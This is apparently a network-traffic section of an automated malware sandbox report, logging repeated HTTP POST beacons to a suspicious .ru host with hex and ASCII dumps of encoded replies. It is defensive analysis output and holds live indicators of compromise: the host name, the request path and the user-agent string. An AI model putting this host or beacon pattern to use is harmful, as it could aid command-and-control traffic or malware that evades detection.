                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 28 27 2e 5b 34 05 09 0e 24 3c 2a 1b 3d 13 0f 10 29 1e 05 08 3d 5e 27 51 26 28 30 5f 3c 2b 2a 0a 33 3f 07 08 20 2d 2c 54 28 10 21 46 04 1e 21 5c 23 58 3c 5e 28 20 32 0e 3d 3f 2f 05 23 20 21 1a 24 04 0c 08 31 38 2b 56 21 12 09 56 33 3f 3f 53 2f 37 22 5c 3a 0e 03 53 26 04 2c 5e 0e 12 3a 0a 25 09 35 12 28 38 29 10 27 09 23 1f 25 5d 3e 05 27 38 27 56 20 28 2a 07 3c 0e 15 53 33 2c 37 0d 2e 3b 34 07 30 07 2f 0c 2a 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U('.[4$<*=)=^'Q&(0_<+*3? -,T(!F!\#X<^( 2=?/# !$18+V!V3??S/7"\:S&,^:%5(8)'#%]>'8'V (*<S3,7.;40/*2!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:59.206228971 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:59.538660049 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:00.073123932 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XR98Ri%2FFyyBuqyxi5spU67NIqyf43wW6amLbo9E6q4Y2E8KFrCAX6ulSuMm%2BzlFnCk1U6UNGMw0nbVzPczdCgs3BXzkeuNoHhbN4GJibJfitu1AdyQCNnATTutqs%2Bpu4amWnTgZu"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940adc1b2f42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12022&min_rtt=1677&rtt_var=9942&sent=632&recv=717&lost=0&retrans=2&sent_bytes=95343&recv_bytes=449964&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 54 2a 34 39 01 23 02 2b 0f 24 3c 0f 07 3d 13 3e 04 29 30 2f 45 2a 38 1a 08 26 28 3c 12 2b 3b 2a 41 30 3f 22 56 20 2e 30 55 3c 10 21 46 04 1e 21 5b 20 58 3c 5b 29 1d 07 53 3e 3c 28 16 21 09 3d 5d 27 39 26 0b 27 38 3b 53 21 3c 33 54 30 3c 3c 09 2c 24 3e 14 3a 20 26 0d 31 2e 2c 5e 0e 12 3a 0a 32 33 21 5d 29 38 35 58 27 09 38 0f 27 28 39 58 27 2b 33 54 34 38 2d 5d 28 1e 15 55 26 3c 24 54 2e 28 27 59 24 3a 37 0c 3e 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#T*49#+$<=>)0/E*8&(<+;*A0?"V .0U<!F![ X<[)S><(!=]'9&'8;S!<3T0<<,$>: &1.,^:23!])85X'8'(9X'+3T48-](U&<$T.('Y$:7>!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:00.073951960 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:00.409724951 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:00.942364931 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rhhwXGn8B78TIHB0Nsk47eaalyLuqqw7GD9IfUANCQSdTIkcnl2O979G9wZ2q2Yef3Z%2BoaKZ2SwMrGbOrRfc8JyVBALPFQWAE9ybGXbpBGzGN47ugBq5QSCKagp5uvnw%2BVigTq0q"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ae188a942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12142&min_rtt=1677&rtt_var=10261&sent=638&recv=722&lost=0&retrans=2&sent_bytes=96333&recv_bytes=452370&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 3f 1d 2a 58 21 2b 2c 1c 33 05 21 07 2a 13 2e 01 3d 30 0d 45 29 28 33 1d 31 06 02 59 3f 16 22 42 24 3f 3a 54 36 13 27 0e 2b 3a 21 46 04 1e 21 1e 34 2e 23 02 2a 0a 2e 0e 29 2c 2b 02 35 0e 36 05 24 03 3e 0b 32 01 3b 10 20 2c 27 1e 30 2c 33 1a 38 27 36 5d 2d 09 39 55 25 04 2c 5e 0e 12 3a 0a 26 1e 1b 10 29 28 35 11 27 56 3b 1d 31 15 3d 59 26 3b 0d 54 23 01 2d 15 3f 09 37 55 27 11 28 1d 39 38 20 06 24 2a 2f 0d 2a 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ?*X!+,3!*.=0E)(31Y?"B$?:T6'+:!F!4.#*.),+56$>2; ,'0,38'6]-9U%,^:&)(5'V;1=Y&;T#-?7U'(98 $*/*2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:00.943289995 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:01.275568962 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:01.807503939 CET971INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ySMPXpIaM5%2FwZZ%2F0pBkbFIHq5YF9yLqqdqHRflGxgB6%2BQ%2FL5WYvV0y9rbkYyr3qCByFd0CoDTHogONgOMDRQbMBpZ61zveh174%2BeD8zehVGgVKLHB2cB%2BmrlEPXIqUqlZswLe1Qh"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ae6f87042cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11427&min_rtt=1677&rtt_var=8848&sent=644&recv=727&lost=0&retrans=2&sent_bytes=97322&recv_bytes=454776&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 2b 1a 2e 10 23 38 38 1e 30 02 3e 14 2a 5b 2a 05 29 0e 28 1b 2a 38 3b 51 27 28 24 58 3e 3b 3e 45 24 2f 21 0c 36 13 38 11 2a 3a 21 46 04 1e 21 5b 34 07 23 07 3d 30 31 1e 29 12 0e 5a 22 20 3e 01 24 3a 3d 53 25 06 3c 0a 21 3f 38 0d 33 02 02 08 2c 34 00 19 2d 30 32 0f 31 04 2c 5e 0e 12 3a 08 25 0e 14 00 2b 3b 3e 03 27 0e 20 08 32 2b 22 03 33 05 33 13 23 38 21 16 28 30 11 55 24 01 2f 0b 2d 2b 3b 5c 24 29 2f 0e 2a 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S+.#880>*[*)(*8;Q'($X>;>E$/!68*:!F![4#=01)Z" >$:=S%<!?83,4-021,^:%+;>' 2+"33#8!(0U$/-+;\$)/*"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:01.809144974 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:02.142896891 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:02.679475069 CET977INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:02 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ex9XrPZjX%2B2tMGVW9WhK3gec2o7%2BAR5O%2F1FryRhbbGzEXh3Vn4%2BMBl9HEzzk%2FNrncrjXk%2FVu8a6nDA5zZ%2BMZ0sb3J%2BM8cdH8pDgGB5fHd9SXzS2qMGe1%2FcDRNSQDtjXU4gIl2hAd"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940aec6dda42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11836&min_rtt=1677&rtt_var=9885&sent=650&recv=732&lost=0&retrans=2&sent_bytes=98318&recv_bytes=457182&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0b 2b 34 36 59 37 5d 2c 54 33 2f 3a 58 29 3e 26 00 3e 30 28 1c 3d 5e 23 1c 26 38 20 13 3f 38 3e 09 33 01 04 56 21 2d 02 56 2b 00 21 46 04 1e 22 01 23 07 30 5b 2a 33 07 53 3d 3c 02 5e 36 20 13 5e 26 2a 21 51 32 01 2c 0f 21 05 30 08 25 2c 33 19 2c 0a 31 05 2f 23 21 1f 31 2e 2c 5e 0e 12 39 1a 31 09 25 5d 3f 16 25 5c 33 23 37 51 31 3b 3e 01 24 3b 2b 1e 20 28 31 14 28 1e 11 54 33 2c 3f 0d 2e 05 3b 16 27 29 34 51 2a 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +46Y7],T3/:X)>&>0(=^#&8 ?8>3V!-V+!F"#0[*3S=<^6 ^&*!Q2,!0%,3,1/#!1.,^91%]?%\3#7Q1;>$;+ (1(T3,?.;')4Q*!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:02.680489063 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:03.014292955 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:03.500010967 CET954INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qOo287Ic9h9JQ3zmwz2uNwNEXaQLpUZyyQ8mfM1P4jjH88ApdK74CoDj41uPePDwyFtjRTtLrAc9QLWykqs250iWRzCiyFyWiTk7C9G2mrxxSMTaRLRqqM8bYPt4m0Bn7ogu313t"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940af1dc4342cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10667&min_rtt=1677&rtt_var=7579&sent=655&recv=737&lost=0&retrans=2&sent_bytes=99320&recv_bytes=459588&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0b 2a 34 04 59 34 38 2f 0c 27 05 3e 16 2a 3e 35 13 29 09 37 41 2a 16 3f 55 31 06 28 10 3c 16 31 18 24 59 2e 50 36 3d 30 1f 2b 00 21 46 04 1e 21 5a 20 00 2c 13 29 23 03 57 3e 05 30 5b 35 1e 3e 00 30 5c 21 14 31 38 3f 1d 21 2c 3b 55 30 02 01 57 3b 1a 03 02 2e 1e 31 10 31 2e 2c 5e 0e 12 39 51 32 09 36 04 2b 38 25 58 33 09 23 1d 26 28 3e 02 33 38 3b 1c 23 16 26 04 3c 0e 19 53 27 01 2c 56 3a 3b 2b 5d 27 5f 23 0c 2a 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a
                                                                        Data Ascii: 98 *4Y48/'>*>5)7A*?U1(<1$Y.P6=0+!F!Z ,)#W>0[5>0\!18?!,;U0W;.11.,^9Q26+8%X3#&(>38;#&<S',V:;+]'_#*"!^/,Q4TV
                                                                        Dec 28, 2024 20:44:03.710823059 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:04.042982101 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:04.590536118 CET970INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvZs1a40e1QxplvvE10nsfyLAk%2BmatNgnfJVH%2BD5bdSzFrtkRkZU1tHLCKiwZOBu84llyMXLa3Eo%2ByOW8KbgmxrEPD%2BpKpA%2F2aSoOUV1CehOTmF0MKCYe3BScTHRQIY3BkPIotkf"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940af84b1942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10087&min_rtt=1677&rtt_var=6755&sent=660&recv=742&lost=0&retrans=2&sent_bytes=100304&recv_bytes=461970&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 2a 37 2e 10 37 05 30 1e 30 3f 3a 5c 3d 03 2a 01 28 23 3f 07 29 3b 2b 54 25 01 33 01 28 01 31 19 33 11 2d 08 36 5b 34 57 3c 3a 21 46 04 1e 21 5d 34 3e 02 59 3d 33 3d 57 29 02 01 04 21 09 39 5d 26 3a 29 52 26 28 30 0c 36 5a 38 09 27 3c 23 53 2c 27 3d 05 39 56 3e 0a 32 14 2c 5e 0e 12 39 51 26 09 26 01 3c 28 13 5b 33 30 28 0d 25 2b 2d 12 27 2b 02 08 23 38 25 14 3c 23 3b 55 26 3c 3c 52 2c 3b 0a 06 33 07 27 08 3e 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#*7.700?:\=*(#?);+T%3(13-6[4W<:!F!]4>Y=3=W)!9]&:)R&(06Z8'<#S,'=9V>2,^9Q&&<([30(%+-'+#8%<#;U&<<R,;3'>"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:04.592837095 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:04.925966978 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:05.461091995 CET970INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:05 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjrb7aI6gcmRLB%2FoPzmo471JgclRY0BGIQYr%2F1JvrQN6j9adQi%2FQ2ukf0ixiNvT0YfxSqO7bLiQcK6N7GUilBM2RjOwjUnbNQQmrsYbiKFGi%2F44K%2Bo4jx5c3S0Dc4OEkqnCQeIgU"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940afdc91c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10603&min_rtt=1677&rtt_var=8209&sent=666&recv=747&lost=0&retrans=2&sent_bytes=101299&recv_bytes=464376&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 2b 34 08 59 21 2b 38 54 24 3c 2a 58 3d 5b 3d 5b 3e 0e 2f 44 3e 28 27 56 25 2b 24 5e 3e 2b 21 1c 33 01 29 08 21 2e 37 0f 28 10 21 46 04 1e 22 00 21 3e 30 12 28 20 36 0f 3e 2c 20 14 23 20 1b 5e 24 14 03 53 31 06 3b 57 36 12 28 0c 33 3c 0e 0a 2f 0a 26 5e 3a 0e 25 52 25 2e 2c 5e 0e 12 39 1a 32 1e 3d 5c 3c 38 31 58 30 30 11 56 25 28 3d 10 26 3b 3f 1d 21 3b 31 16 2b 0e 3f 1d 33 2c 38 53 2d 15 2f 5f 27 29 0d 09 2a 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +4Y!+8T$<*X=[=[>/D>('V%+$^>+!3)!.7(!F"!>0( 6>, # ^$S1;W6(3</&^:%R%.,^92=\<81X00V%(=&;?!;1+?3,8S-/_')*!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:05.462404013 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2088
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:05.795557022 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:06.632049084 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7VRCI3n2rCTlBqKJWtvuspXnmBHfKKdmc1ircQPc0Zf1wEwlNwW2jp4TK%2F3gNr9e99lBssX7bjOT5H%2FOlyU%2F2bhrHKLtUREyQayUMDIproUAfxdPKJzqGov9cWYPfsPst4E64T%2Fx"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b033e2042cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9724&min_rtt=1677&rtt_var=6607&sent=672&recv=752&lost=0&retrans=2&sent_bytes=102294&recv_bytes=466770&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0b 2b 34 07 02 34 28 2c 1f 33 2f 26 5e 3d 3d 3e 01 29 30 33 45 3d 06 1e 0f 31 16 28 10 2b 06 36 43 30 3f 39 0f 20 2d 09 0b 2a 3a 21 46 04 1e 21 5d 37 3e 06 12 29 0a 21 1c 3e 02 20 5c 22 30 35 15 26 3a 2e 09 31 16 09 1f 35 2f 33 13 30 05 3c 08 3b 27 32 5a 2d 23 39 56 31 3e 2c 5e 0e 12 3a 08 25 09 29 59 29 3b 29 5c 24 33 2b 50 25 05 2d 58 24 2b 27 54 20 28 3d 1b 2b 56 28 0f 24 2c 20 56 39 38 2b 16 27 29 06 51 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +44(,3/&^==>)03E=1(+6C0?9 -*:!F!]7>)!> \"05&:.15/30<;'2Z-#9V1>,^:%)Y);)\$3+P%-X$+'T (=+V($, V98+')Q="!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:06.632925034 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:06.666804075 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7VRCI3n2rCTlBqKJWtvuspXnmBHfKKdmc1ircQPc0Zf1wEwlNwW2jp4TK%2F3gNr9e99lBssX7bjOT5H%2FOlyU%2F2bhrHKLtUREyQayUMDIproUAfxdPKJzqGov9cWYPfsPst4E64T%2Fx"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b033e2042cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9724&min_rtt=1677&rtt_var=6607&sent=672&recv=752&lost=0&retrans=2&sent_bytes=102294&recv_bytes=466770&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0b 2b 34 07 02 34 28 2c 1f 33 2f 26 5e 3d 3d 3e 01 29 30 33 45 3d 06 1e 0f 31 16 28 10 2b 06 36 43 30 3f 39 0f 20 2d 09 0b 2a 3a 21 46 04 1e 21 5d 37 3e 06 12 29 0a 21 1c 3e 02 20 5c 22 30 35 15 26 3a 2e 09 31 16 09 1f 35 2f 33 13 30 05 3c 08 3b 27 32 5a 2d 23 39 56 31 3e 2c 5e 0e 12 3a 08 25 09 29 59 29 3b 29 5c 24 33 2b 50 25 05 2d 58 24 2b 27 54 20 28 3d 1b 2b 56 28 0f 24 2c 20 56 39 38 2b 16 27 29 06 51 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +44(,3/&^==>)03E=1(+6C0?9 -*:!F!]7>)!> \"05&:.15/30<;'2Z-#9V1>,^:%)Y);)\$3+P%-X$+'T (=+V($, V98+')Q="!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:06.966998100 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:07.499813080 CET971INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:07 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Oq5ubH7Hp%2Bzl3ZyD%2BzV1%2FfVd4%2FNWXCfGUpNnukOBknuMW0UH82%2BtAbBgSzw3U6HW53U2d6kciuApEDgz8x8LH2Fa88knsvAU%2FZkqH3dgMLV0bcBv445ohA3tUvffXLOAqUwvoxL"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b0a8d8a42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9103&min_rtt=1677&rtt_var=5702&sent=678&recv=757&lost=0&retrans=2&sent_bytes=103286&recv_bytes=469176&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 28 34 3a 5b 34 05 24 54 30 02 3d 06 2a 13 36 03 3e 30 2c 1c 29 01 20 0f 27 38 02 10 3e 28 2e 43 27 2f 26 1c 35 2d 28 53 2b 00 21 46 04 1e 21 59 37 3d 37 03 29 0a 35 55 3e 02 3c 17 36 33 36 01 33 39 2d 53 31 06 27 54 22 3c 2b 50 25 2c 27 50 38 1d 21 06 2e 09 3d 1f 31 3e 2c 5e 0e 12 3a 0b 25 1e 39 58 2b 06 29 59 30 56 28 0d 25 3b 03 11 27 15 20 0f 21 38 39 58 2b 1e 16 0e 30 3f 37 0c 3a 15 3f 5e 24 3a 30 57 3d 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (4:[4$T0=*6>0,) '8>(.C'/&5-(S+!F!Y7=7)5U><63639-S1'T"<+P%,'P8!.=1>,^:%9X+)Y0V(%;' !89X+0?7:?^$:0W=!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:07.500504017 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:07.832963943 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:08.381503105 CET963INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnEoXdFw9Meu1xE8%2BZHX1fOwFnrYqItvTfJP7Nl96DkHOR1uh1Up7BN9tlGN6%2B1chlfsDxg6RXP1hGdR0BMynNTLBJf0Q4aiq99qA232WLmivmmMIffY8KZhAXgoBRX4376k9X9R"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b0ffb7842cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
